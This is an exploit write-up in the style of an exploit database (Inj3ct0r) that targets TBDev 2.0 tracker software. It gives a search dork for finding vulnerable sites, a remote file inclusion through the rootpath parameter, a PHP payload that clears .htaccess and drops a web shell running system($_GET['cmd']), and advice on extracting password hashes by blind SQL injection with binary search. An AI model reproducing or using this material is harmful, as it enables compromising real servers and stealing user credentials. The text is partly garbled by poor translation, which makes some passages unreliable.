=======================================
TBDev2 Blind SQL Inj3ct0r + RFI Exploit
=======================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


product: TBDev
version: 2.0
site: tbdev.net
Dork:"Powered by TBDev v2.0"


LFI/RFI in the admin panel using parameter admincp.php?rootpath=

	
If register_globals ON, then the LFI/RFI available and not from the admin area, and from the index.php, the same parameter.

Read the commentary to exploit, to fill the shell, you need to put the code :

<?php
  file_put_contents("torrents/.htaccess", "");
  file_put_contents("torrents/shell.php", "<? system(\$_GET['cmd']) ?>");
?>


	
In the file available for reading on your server and set the path to it in the variable $uploader.

The same exploit could simply pull the hash, the salt is not zakachivaya shell. Use binary search, 
so that the query is sent relatively few, for a blind cheek. (maximum of 4 requests per character, 
instead of steadily to 16, with an exhaustive search, ie working at least 4 times faster than exhaustive search. 
And in general for all exploits with blind sql inj3ct0r, BENCHMARK, or using brute force table names, should use the binary algorithm Search or faster)

In the directory 'admin' in general I've found is (core.php) to read:

$op = (!isset($_REQUEST['op'])) ? "Main" : $_REQUEST['op'];

foreach ($_GET as $key => $value)
	$GLOBALS[$key] = $value;
foreach ($_POST as $key => $value)
	$GLOBALS[$key] = $value;
foreach ($_COOKIE as $key => $value)
	$GLOBALS[$key] = $value;

	
This file include in admin.php.

----------------------------------------------

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~  - [ [ : Inj3ct0r : ] ]